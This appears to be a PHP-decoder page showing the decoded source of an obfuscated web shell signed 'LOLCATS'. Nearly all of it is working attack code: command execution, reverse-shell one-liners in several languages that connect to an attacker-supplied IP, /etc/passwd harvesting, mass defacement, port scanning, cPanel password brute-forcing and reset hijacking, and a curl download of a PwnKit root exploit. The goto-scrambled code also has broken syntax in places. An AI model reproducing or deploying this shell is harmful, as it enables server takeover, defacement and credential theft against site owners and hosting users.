Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto qAxlZ; H4Yyw: if ($_1337["\151\144"] == "\x6a\x75\x6d\x70\x69\x6e\147") { s..
Decoded Output download
<?php
goto qAxlZ; H4Yyw: if ($_1337["id"] == "jumping") { s(); $i = 0; echo "<center class='anu'>Jumping</center>
<div class='card card-body text-dark input-group mb-3'>"; echo "<pre>"; $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all("/(.*?):x:/", $passwd, $jumpss); foreach ($jumpss[1] as $uservaljump) { $valuserjumpindir = "/home/{$uservaljump}/public_html"; if (is_readable($valuserjumpindir)) { $i++; $jrw = "[<i class='bi bi-file-earmark'></i> | R] <a href='?path={$valuserjumpindir}'>{$valuserjumpindir}</a>"; if (is_writable($valuserjumpindir)) { $jrw = "[<i class='bi bi-file-earmark-fill'></i> | RW] <a href='?path={$valuserjumpindir}'>{$valuserjumpindir}</a>"; } echo $jrw; if (function_exists("posix_getpwuid")) { $domain_jump = file_get_contents("/etc/named.conf"); if ($domain_jump == '') { echo " -> [<font color=red>Cannot get domain name</font>]"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domjump); foreach ($domjump[1] as $dj) { $valuserjump = posix_getpwuid(@fileowner("/etc/valiases/{$dj}")); $valuserjump = $valuserjump["name"]; if ($valuserjump == $uservaljump) { echo " -> [<u>{$dj}</u>]<br>"; break; } } } } else { echo "<br>"; } } } } } if ($i == 0) { } else { echo "<br>Total " . $i . " Can jumping on this server " . gethostbyname($_SERVER["HTTP_HOST"]) . "!"; } echo "</pre>\xa </div>"; } goto iHhYJ; Qt1rA: if ($_1337["action"] == "rename_folder") { if ($_1337["r_d"]) { $r_d = rename($dir, '' . dirname($dir) . "/" . htmlspecialchars($_1337["r_d"]) . ''); if ($r_d) { echo "<strong>Rename folder</strong> OK! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Rename folder</strong> FAIL! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } s(); echo "
\x9<div class='btn-group'>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified_folder'><i class='bi bi-calendar-date'></i></a>\xa<!--<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod'><i class='bi bi-file-earmark-medical'></i></a>-->\xa<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
\x9 </div>\xa\x9\x9<br>
\x9<i class='bi bi-folder-fill'></i>: " . basename($dir) . "\xa </br>
\x9<form method='POST'>
\x9<div class='input-group'>\xa\x9\x9 <input class='form-control btn-sm' type='text' value='" . basename($dir) . "' name='r_d' {$_r}>
\x9 \x9<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-emoji-smile-upside-down'></i></button>
\x9\x9</div>\xa </form>"; } goto HwDnQ; xSzhg: function exe($cmd) { $method = ''; if (function_exists("system")) { $method = "system"; @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return "{$method}: {$buff}"; } elseif (function_exists("exec")) { $method = "exec"; @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return "{$method}: {$buff}"; } elseif (function_exists("passthru")) { $method = "passthru"; @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return "{$method}: {$buff}"; } elseif (function_exists("shell_exec")) { $method = "shell_exec"; $buff = @shell_exec($cmd); return "{$method}: {$buff}"; } elseif (function_exists("`")) { $method = "backticks"; $buff = `{$cmd}`; return "{$method}: {$buff}"; } elseif (function_exists("popen")) { $method = "popen"; $handle = @popen($cmd, "r"); $buff = ''; if ($handle) { while (!feof($handle)) { $buff .= fread($handle, 4096); } @pclose($handle); } return "{$method}: {$buff}"; } elseif (function_exists("proc_open")) { $method = "proc_open"; $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = @proc_open($cmd, $descriptorspec, $pipes); $buff = ''; if (is_resource($process)) { fclose($pipes[0]); while (!feof($pipes[1])) { $buff .= fread($pipes[1], 4096); } fclose($pipes[1]); fclose($pipes[2]); @proc_close($process); } return "{$method}: {$buff}"; } return false; } goto O80k0; iv_HC: @ini_set("output_buffering", 0); goto x7c3H; wq8hw: if (isset($_1337["opn"])) { $file = $_1337["opn"]; } goto x5qzN; epcoG: function ia() { $ia = ''; if (getenv("HTTP_CLIENT_IP")) { $ia = getenv("HTTP_CLIENT_IP"); } elseif (getenv("HTTP_X_FORWARDED_FOR")) { $ia = getenv("HTTP_X_FORWARDED_FOR"); } elseif (getenv("HTTP_X_FORWARDED")) { $ia = getenv("HTTP_X_FORWARDED"); } elseif (getenv("HTTP_FORWARDED_FOR")) { $ia = getenv("HTTP_FORWARDED_FOR"); } elseif (getenv("HTTP_FORWARDED")) { $ia = getenv("HTTP_FORWARDED"); } elseif (getenv("REMOTE_ADDR")) { $ia = getenv("REMOTE_ADDR"); } else { $ia = "Unknown IP"; } return $ia; } goto gVMRu; BO6Au: echo " [ " . w($path, p($path)) . " ]"; goto S_jZN; sxLaR: function logsx() { die("<form method='post'><input type='password' style='text-decoration:none;background-color: transparent;border: none;border-bottom: 0px;color: transparent;outline: none;' name='pass'></form>"); } goto eqiB1; lHbNL: @ini_set("log_errors", 0); goto N78pn; wJ3It: $disfunc = @ini_get("disable_functions"); goto W00tD; xxaNk: if ($_1337["id"] == "backcon") { s(); echo "<center class="anu">Back Connect (Reverse Shell)</center>"; echo "<div class='card card-body text-dark input-group mb-3'>\xa\x9<form method='post'>
<i class='bi bi-hdd-network'></i> IP Address:\xa\x9\x9 <input type='text' class='form-control btn-sm text-dark' name='ip' placeholder='IP'>
<i class='bi bi-hdd'></i> Port:
\x9\x9\x9<input type='text' class='form-control btn-sm text-dark' name='port' placeholder='Port'>\xa <i class='bi bi-hdd-network'></i> Reverse Shell using:\xa\x9 <select class='form-control btn-sm text-dark' name='backdoor'>
\x9\x9\x9 <option value='1'>Python</option>\xa <option value='2'>Python3</option>\xa \x9 \x9<option value='3'>PHP</option>\xa\x9\x9 <option value='4'>Perl</option>
\x9 <option value='5'>Bash</option>
<option value='7'>Netcat</option>\xa <option value='6'>Windows (Powershell)</option>
\x9\x9</select>\xa <div class='d-grid gap-2'><button type='submit' class='btn btn-dark btn-sm' name='submit'>Submit!</button></div>\xa\x9</form></div><br>"; if (isset($_POST["submit"])) { $backdoor = $_POST["backdoor"]; $ip = $_POST["ip"]; $port = $_POST["port"]; if ($backdoor == 1) { $command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{$ip}",{$port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"; } elseif ($backdoor == 2) { $command = "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{$ip}",{$port}));os.dup2(s.fileno(),0); subprocess.call(["/bin/sh","-i"]);'"; } elseif ($backdoor == 3) { $command = "php -r '$sock=fsockopen("{$ip}",{$port});stream_set_blocking($sock, 0);$cmd="/bin/sh -i";proc_close(proc_open($cmd, array(0=>$sock, 1=>$sock, 2=>$sock), $foo));'"; } elseif ($backdoor == 4) { $command = "perl -e 'use Socket;$i="{$ip}";$p={$port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"; } elseif ($backdoor == 5) { $command = "/bin/bash -c 'bash -i >& /dev/tcp/{$ip}/{$port} 0>&1'"; } elseif ($backdoor == 6) { $command = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient('$ip',$port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"; } elseif ($backdoor == 7) { $command = "sh -c 'nc {$ip} {$port} -e /bin/bash || nc {$ip} {$port} -c /bin/bash'"; } if (function_exists("system")) { system($command); } elseif (function_exists("exec")) { exec($command); } elseif (function_exists("shell_exec")) { shell_exec($command); } elseif (function_exists("passthru")) { passthru($command); } elseif (function_exists("popen")) { $handle = popen($command, "r"); if ($handle) { while (!feof($handle)) { echo fgets($handle, 4096); } pclose($handle); } } else { proc_open($command, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")), $pipes); } echo `{$command}`; } } goto nShOo; e7iUg: function Yolo($array) { return is_array($array) ? array_map("Yolo", $array) : stripslashes($array); } goto YjChs; YgDiD: echo "
<div class="table-responsive">
<table class="table table-hover table-dark text-light">
\x9<thead>\xa \x9<tr>\xa\x9\x9\x9<td class="text-center">NAME</td>\xa\x9\x9\x9 <td class="text-center">TYPE</td>
\x9<td class="text-center">LAST MODIFIED</td>\xa\x9\x9\x9 <td class="text-center">SIZE</td>
\x9\x9 <td class="text-center">OWNER <font class="text-danger">/</font> GROUP</td>
\x9\x9 \x9<td class="text-center">PERMISSIONS</td>
\x9 <td class="text-center">ACTION</td>\xa \x9</tr>
</thead>
\x9 <tbody class="text-nowrap">\xa\x9\x9<tr>\xa \x9<td><i class="bi bi-folder2-open"></i> <a class="text-decoration-none text-white" href="?path=" . dirname($dir) . "">..</a></td><td></td><td></td><td></td><td></td><td></td><td class="text-center">\xa\x9 \x9\x9<div class="btn-group">\xa <a class="btn btn-outline-light btn-sm" href="?filenew&path=" . $dir . ""><i class="bi bi-file-earmark-plus"></i></a>\xa \x9\x9 \x9<a class="btn btn-outline-light btn-sm" href="?dirnew&path=" . $dir . ""><i class="bi bi-folder-plus"></i></a>
\x9 \x9 </div>
\x9\x9</td>
\x9</tr>"; goto JELCs; iHhYJ: if ($_1337["id"] == "portscan") { s(); echo "<center class="anu">Port Scanner</center>"; echo "\xa <div class='card card-body text-dark input-group mb-3'>\xa <form method='post'>\xa <div class='form-group'>\xa <i class='bi bi-hdd-network'></i> Target IP:
<input type='text' class='form-control btn-sm text-dark' name='target' placeholder='" . $_SERVER["HTTP_HOST"] . "' required>\xa </div>
<div class='form-group'>\xa <i class='bi bi-hdd'></i> Start Port:\xa <input type='number' class='form-control btn-sm text-dark' name='startPort' placeholder='21' required>
</div>\xa <div class='form-group'>\xa <i class='bi bi-hdd'></i> End Port:
<input type='number' class='form-control btn-sm text-dark' name='endPort' placeholder='10000' required>\xa </div>\xa <div class='d-grid gap-2'>
<input class='btn btn-dark btn-sm' type='submit' name='scan' value='Submit!'>\xa </div>\xa </form>\xa</div>"; if (isset($_POST["scan"])) { $target = isset($_POST["target"]) ? $_POST["target"] : "localhost"; $startPort = $_POST["startPort"]; $endPort = $_POST["endPort"]; echo "<div class='card card-body text-dark'><ul>"; for ($port = $startPort; $port <= $endPort; $port++) { $connection = @fsockopen($target, $port, $errno, $errstr, 1); echo "<li>"; echo "Port {$port}: "; if ($connection) { echo "<gr>Open</gr>"; fclose($connection); } else { echo "<rd>Close</rd>"; } echo "</li>"; } echo "</ul></div>"; } } goto vo_iU; HKnrr: if ($_1337["id"] == "deface") { function mass_all($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { file_put_contents($, $contents_sc); } elseif ($dirb === "..") { file_put_contents($, $contents_sc); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$}<br>"; file_put_contents($, $contents_sc); $ = mass_all($dirc, $namefile, $contents_sc); } } } } } } function mass_onedir($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { file_put_contents($, $contents_sc); } elseif ($dirb === "..") { file_put_contents($, $contents_sc); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$dirb}/{$namefile}<br>"; file_put_contents($, $contents_sc); } } } } } } if ($_1337["start"]) { if ($_1337["tipe"] == "mass") { mass_all($_1337["d_dir"], $_1337["d_file"], $_1337["script"]); } elseif ($_1337["tipe"] == "onedir") { mass_onedir($_1337["d_dir"], $_1337["d_file"], $_1337["script"]); } } s(); echo "<center class="anu">Mass Deface</center>"; echo "\xa\x9 <div class='card card-body text-dark input-group mb-3'>
\x9 <form method='POST'> Select Type:\xa\x9\x9\x9<div class='form-check'>
\x9\x9\x9\x9<input class='form-check-input' type='checkbox' value='onedir' name='tipe' id='flexCheckDefault' checked>
\x9 <label class='form-check-label' for='flexCheckDefault'>One directory</label>
\x9\x9\x9</div>\xa \x9 <div class='form-check'>\xa <input class='form-check-input' type='checkbox' value='mass' name='tipe' id='flexCheckDefault'>
<label class='form-check-label' for='flexCheckDefault'>All directory</label>
\x9</div>
\x9<i class='bi bi-folder'></i> Directory:\xa \x9\x9<input class='form-control btn-sm text-dark' type='text' name='d_dir' value='{$dir}/'>
\x9 \x9<i class='bi bi-file-earmark'></i> Filename:
\x9 \x9<input class='form-control btn-sm text-dark' type='text' name='d_file' placeholder='lolcats.txt'>
\x9 \x9<i class='bi bi-code-square'></i> Your Script:
\x9 \x9<textarea class='form-control btn-sm text-dark' rows='7' name='script' placeholder='Hacked by Lolcats'></textarea>
\x9\x9\x9<div class='d-grid gap-2'>
\x9\x9<input class='btn btn-dark btn-sm' type='submit' name='start' value='Submit!'>
\x9\x9\x9</div>\xa\x9 \x9</form>
\x9 </div>"; } goto JjZzp; xpwtc: if ($_1337["id"] == "pwnkit") { ob_implicit_flush(); ob_end_flush(); echo "<center class="anu">Auto Root Using Pwnkit</center>"; echo "<div class="container-fluid language-javascript">
\x9<div class="shell mb-3">\xa \x9\x9\x9 \x9<pre style="font-size:10px;"><code>" . exe_root("curl https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o cats;chmod +x cats;./cats id", $path) . "<br>If successful, u can run as root user using command: ./cats "YOUR COMMAND"</code></pre></div></div>"; } goto zKCFG; vo_iU: if ($_1337["action"] == "changemodified_folder") { s(); function changeDate($itemPath, $newDate) { if (is_file($itemPath) || is_dir($itemPath)) { if (touch($itemPath, strtotime($newDate))) { return true; } else { return false; } } return false; } $currentTime = microtime(true); $microseconds = sprintf("%06d", ($currentTime - floor($currentTime)) * 1000000); $dateTimeWithMicroseconds = date("Y-m-d H:i:s.", $currentTime) . $microseconds; $itemToChangeDate = $_GET["opn"]; $itemPathToChangeDate = $path . "/" . $itemToChangeDate; echo "<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified_folder'><i class='bi bi-calendar-date'></i></a>
<!--<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod'><i class='bi bi-file-earmark-medical'></i></a>-->\xa<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa</div>\xa<br><i class='bi " . (is_dir($itemPathToChangeDate) ? "bi-folder" : "bi-file-earmark") . "'></i>: " . basename($itemPathToChangeDate) . "</br>
<form method='POST'><div class='input-group'><input class='form-control btn-sm' type='text' name='new_date' value='" . $dateTimeWithMicroseconds . "' {$_r}>\xa<button class='btn btn-outline-light btn-sm' type='sumbit' name='changemodified_folder'><i class='bi bi-emoji-smile-upside-down'></i></button>\xa</div>\xa</form>"; if (isset($_POST["changemodified_folder"])) { $newDate = $_POST["new_date"]; if (changeDate($itemPathToChangeDate, $newDate)) { echo "<strong>Change Date</strong> OK! " . ok() . "</div>"; } else { echo "<strong>Change Date</strong> FAIL! " . er() . "</div>"; } } } goto YFNC7; EfyhR: $sm = @ini_get(strtolower("safe_mode")) == "on" ? "<rd>ON</rd>" : "<gr>OFF</gr>"; goto mThJN; FP6mR: if ($_1337["id"] == "upload") { s(); echo "<center class="anu">Upload File (From URL + Your Computer)</center>"; $userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"; if ($_SERVER["REQUEST_METHOD"] === "POST") { if (isset($_POST["url"]) && isset($_POST["output_filename"]) && isset($_POST["method"])) { $url = $_POST["url"]; $outputFilename = $_POST["output_filename"]; $method = $_POST["method"]; switch ($method) { case "file_get_contents": $context = stream_context_create(array("http" => array("header" => "User-Agent: {$userAgent}"))); $file_content = file_get_contents($url, false, $context); file_put_contents($outputFilename, $file_content); break; case "curl": $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, $userAgent); $data = curl_exec($ch); curl_close($ch); file_put_contents($outputFilename, $data); break; case "fopen": $readHandle = fopen($url, "rb"); $writeHandle = fopen($outputFilename, "wb"); if ($readHandle && $writeHandle) { while (!feof($readHandle)) { fwrite($writeHandle, fread($readHandle, 8192)); } } fclose($readHandle); fclose($writeHandle); break; case "copy": $context = stream_context_create(array("http" => array("header" => "User-Agent: {$userAgent}"))); copy($url, $outputFilename, $context); break; case "stream_context": $context = stream_context_create(array("http" => array("method" => "GET", "header" => "User-Agent: {$userAgent}"))); $file_content = file_get_contents($url, false, $context); file_put_contents($outputFilename, $file_content); break; case "file": $context = stream_context_create(array("http" => array("header" => "User-Agent: {$userAgent}"))); $file_content = file($url, false, $context); file_put_contents($outputFilename, implode('', $file_content)); break; default: echo "<script>alert('Invalid method specified.);</script>"; die; } if (filesize($outputFilename) > 0) { $protocol = !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" || $_SERVER["SERVER_PORT"] == 443 ? "https" : "http"; $domain = $_SERVER["HTTP_HOST"]; $link = "{$protocol}://{$domain}/{$outputFilename}"; echo "<center><p>Gotcha! Click the link below to access the uploaded file:</p><a href=" . $link . " target='_blank' class='btn btn-danger'>" . basename($outputFilename) . "</a><br><br>"; } else { echo "<script>alert('Failed to download the file or file size is 0 byte.');</script>"; } } } echo "<div class="card card-body text-dark input-group mb-3">
\x9 <form action="" method="post">\xa\x9 <div class="form-group d-flex align-items-center">
\x9\x9<input type="text" class="form-control form-control-sm text-dark flex-grow-1" placeholder="https://piranha.go.id/files/myfiles.txt" name="url" id="url" required>\xa \x9 <input type="text" class="form-control form-control-sm text-dark" name="output_filename" placeholder="saved.txt" id="output_filename" required style="width: 300px;">
\x9 <select class="form-control form-control-sm text-dark" name="method" id="method" required style="width: 200px;">
<option value="file_get_contents">file_get_contents</option>
<option value="curl">cURL</option>
<option value="fopen">fopen</option>
<option value="copy">copy</option>\xa <option value="stream_context">stream_context</option>\xa <option value="file">file</option>
\x9 \x9</select>
<button class="btn btn-dark btn-sm" type="submit" name="upl">Save!</button>\xa\x9 </div>\xa\x9 </form>\x9\x9
<form method="POST" enctype="multipart/form-data">
<div class="input-group">
<input class="form-control form-control-sm text-dark" type="file" name="file[]" multiple="">
<div class="input-group-append">\xa <button class="btn btn-dark btn-sm" type="submit" name="upl">Upload!</button>
</div>\xa </div>
</form>
</div>\xa </div>\xa </div>"; if (isset($_POST["upl"])) { $result = count($_FILES["file"]["name"]); for ($contents = 0; $contents < $result; $contents++) { $namefile = $_FILES["file"]["name"][$contents]; if ($_FILES["file"]["size"][$contents] === 0) { $up = @copy($_FILES["file"]["tmp_name"][$contents], "{$path}/" . $namefile); if (!$up) { $fileContent = file_get_contents($_FILES["file"]["tmp_name"][$contents]); if ($fileContent !== false) { $up = file_put_contents("{$path}/" . $namefile, $fileContent); } } } else { $up = move_uploaded_file($_FILES["file"]["tmp_name"][$contents], "{$path}/" . $namefile); } } if ($result < 2) { if ($up) { $downloadLink = $urlwebsite . str_replace(realpath($_SERVER["DOCUMENT_ROOT"]), '', realpath(getcwd())) . "/" . basename($namefile); echo "<br><center><p>G0tchaa! Click the link below to access the uploaded file:</p><a href='{$downloadLink}' target='_blank' class='btn btn-danger'>" . basename($namefile) . "</a></center><br>"; } } else { echo "<div class='alert alert-success' role='alert'>Upload {$result} OK!</div>"; } } } goto wq8hw; YjChs: $_POST = Yolo($_POST); goto sgMYv; eqiB1: function Yolosetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto ZaPiC; PKEsQ: if (isset($_1337["dir"])) { $dir = $_1337["dir"]; chdir($dir); } else { $dir = $gcw(); } goto GLlWs; W00tD: if (empty($disfunc)) { $disfc = "<gr>NONE</gr>"; } else { $disfc = "<rd>{$disfunc}</rd>"; } goto pJlC5; HwDnQ: if (isset($_1337["r_f"])) { $old = $file; $new = $_1337["new_name"]; rename($new, $old); if (file_exists($new)) { echo "<div class="alert alert-danger alert-dismissible fade show my-3" role="alert">
\x9<strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\xa\x9\x9</div>"; } else { if (rename($old, $new)) { echo "<strong>Rename file</strong> OK! " . ok() . "</div>"; } else { echo "<strong>Rename file</strong> FAIL! " . er() . "</div>"; } } } goto XcvSP; S0ump: if (isset($_1337["edit_file"])) { $updt = fopen("{$file}", "w"); $result = fwrite($updt, $_1337["contents"]); if ($result) { echo "<strong>Edit file</strong> OK! " . ok() . "</div>"; } else { echo "<strong>Edit file</strong> FAIL! " . er() . "</div>"; } } goto H5qMP; AQaOe: $curl = function_exists("curl_version") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto yAMz0; ZfZWC: if ($_1337["id"] == "cpanel") { s(); echo "<center class="anu">cPanel Tools</center>
<div class="card card-body text-dark input-group mb-3">\xa <form action="" method="post">
<div class="form-group">
<label for="option">Select an option:</label>
<select name="option" class="form-control">\xa <option value="reset">Reset Password using Email</option>
<option value="brute">Brute Force Password</option>\xa </select>
</div>\xa <div class="form-group">\xa <i class="bi bi-envelope-fill"></i> <label for="userEmail">Your email (for reset password!)</label>
<div class="input-group">
<input type="email" class="form-control btn-sm text-dark" name="userEmail" placeholder="[email protected]">\xa </div>
</div>\xa <div class="form-group">\xa <label for="host">cPanel Host:</label>
<input type="text" class="form-control btn-sm text-dark" name="host" value="https://" . $_SERVER["HTTP_HOST"] . ":2083">\xa </div>\xa <div class="form-group">\xa <label for="usernames">Usernames (auto get user from /etc/passwd & the one in /home/):</label>
<textarea class="form-control btn-sm text-dark" name="usernames" rows="5">"; $usernames = file("/etc/passwd"); foreach ($usernames as $user) { $userData = explode(":", $user); $username = $userData[0]; $homeDir = $userData[5]; if (strpos($homeDir, "/home/") === 0 && is_dir($homeDir)) { echo $username . "\xa"; } } echo "</textarea>
</div>\xa <div class="form-group">\xa <label for="passwords">Password List (one per line):</label>\xa <textarea class="form-control btn-sm text-dark" name="passwords" rows="5" placeholder="password1 password2 password3"></textarea>\xa </div>
<div class="d-grid gap-2">
<input class="btn btn-dark btn-sm" type="submit" name="submit" value="Submit!">\xa </div>
</form>
</div>\xa "; if (isset($_POST["submit"])) { $option = $_POST["option"]; $userEmail = $_POST["userEmail"]; $host = $_POST["host"]; $passwordList = explode(PHP_EOL, trim($_POST["passwords"])); $usernameList = explode(PHP_EOL, trim($_POST["usernames"])); if ($option == "reset" && !empty($userEmail)) { $currentUser = get_current_user(); $userInfo = "email:" . $userEmail; $fileHandle = fopen("/home/" . $currentUser . "/.cpanel/contactinfo", "w"); fwrite($fileHandle, $userInfo); fclose($fileHandle); $fileHandle = fopen("/home/" . $currentUser . "/.contactinfo", "w"); fwrite($fileHandle, $userInfo); fclose($fileHandle); $protocol = "https://"; $cpanelPort = "2083"; $resetPassLink = $host . ":2083/resetpass?start=1"; $readContactInfo = @file("/home/" . $currentUser . "/.cpanel/contactinfo"); if (!$readContactInfo) { echo "<center><h1>Sorry, access denied!</h1><br><br></pre></center>"; } else { echo "<center>DONE! Copy this username for Reset Password cPanel<br></center>"; echo "<div class="text-center"><input type="text" class="form-control" value="" . $currentUser . "" id="user"> <button onclick="copyUsername()" class="btn btn-success"><i class="bi bi-clipboard"></i> COPY TEXT</button></div>"; echo "<br/><div class="text-center"><a target="_blank" href="" . $protocol . $resetPassLink . "">Reset Password Link</a></div>"; } } elseif ($option == "brute" && !empty($host) && !empty($passwordList) && !empty($usernameList)) { $successfulLogins = array(); $failedLogins = array(); foreach ($usernameList as $username) { $username = trim($username); foreach ($passwordList as $password) { $password = trim($password); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$host}/login/?login_only=1"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "user={$username}&pass={$password}"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $response = curl_exec($ch); curl_close($ch); if (strpos($response, "cpsess") !== false) { $successfulLogins[] = "Username: {$username} | Password: {$password}"; } else { $failedLogins[] = "Username: {$username} | Password: {$password}"; } } } $successfulOutput = implode("\xa", $successfulLogins); $failedOutput = implode("
", $failedLogins); echo "<div class="form-group">"; echo "<center><h2>Brute Force Results</h2></center>"; echo "<textarea class="form-control btn-sm text-dark" rows="7" readonly>" . htmlspecialchars($successfulOutput) . "</textarea>"; echo "</div>"; } else { echo "<script>alert('Pay attention to the choices and forms you fill out, stupid!')</script>"; } } } goto xpwtc; LZ0AL: @ini_set("error_log", null); goto lHbNL; H5qMP: if ($_1337["action"] == "edit") { s(); echo "
\x9\x9<div class='btn-group'>\xa\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified&opn={$file}'><i class='bi bi-calendar-date'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod&opn={$file}'><i class='bi bi-file-earmark-medical'></i></a>\xa<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>\xa</div><br><i class='bi bi-file-earmark'></i>: " . basename($file) . "</br>\xa\x9\x9<form method='POST'>
\x9<textarea class='form-control btn-sm' rows='10' name='contents' {$_r}>" . htmlspecialchars(file_get_contents($file)) . "</textarea>\xa\x9 <div class='d-grid gap-2'><br>
\x9<button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'><i class='bi bi-emoji-smile-upside-down'></i></button>
\x9 </div>\xa \x9</form>"; } goto Qt1rA; c4BSp: function ok() { echo "<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto KJRak; HWVuk: if (isset($_1337["dirnew"])) { s(); if (isset($_1337["create"])) { $name = $_1337["name_dir"]; foreach ($name as $name_dir) { $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $name_dir); $fd = @mkdir($folder); } if ($fd) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Create dir</strong> FAIL! " . er() . "</div>"; } } echo "
\x9<div class='mb-3'>\xa \x9\x9<form method='POST'>\xa\x9\x9 <i class='bi bi-folder'></i> Directory name:
\x9\x9<div class='input-group mb-3'>\xa\x9 \x9 <input class='form-control form-control-sm text-dark' type='text' name='name_dir[]' placeholder='New Folder' {$_r}>\xa \x9 \x9<input class='btn btn-outline-light btn-sm' type='submit' name='create' value='Create Directory!'>
\x9\x9</div>\xa </form>\xa </div>"; } goto YgDiD; I3jr4: $pl = exe("perl --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto S3aat; S_jZN: $sql = function_exists("mysql_connect") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto AQaOe; GLlWs: $path = str_replace("\", "/", $path); goto uWBu2; zUYD7: echo "</tbody></table></div><center><div class='text-white'><hr><font color='white'>© LOLCATS</font></div></center></body></html>"; goto QJtcJ; zGf7Y: function sz($byt) { $typ = array("B", "KB", "MB", "GB", "TB"); for ($i = 0; $byt >= 1024 && $i < count($typ) - 1; $byt /= 1024, $i++) { } return round($byt, 2) . " " . $typ[$i]; } goto epcoG; qpHXb: $scand = scandir($path); goto BO6Au; uqK5Y: $pkexec = exe("pkexec --version"") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto wJ3It; o9cS8: function w($dir, $perm) { if (!is_writable($dir)) { return "<rd>" . $perm . "</rd>"; } else { return "<gr>" . $perm . "</gr>"; } } goto nyFwq; N78pn: @ini_set("max_execution_time", 0); goto iv_HC; T0K_d: if (isset($_1337["path"])) { $path = $_1337["path"]; chdir($path); } else { $path = $gcw(); } goto gUtZv; 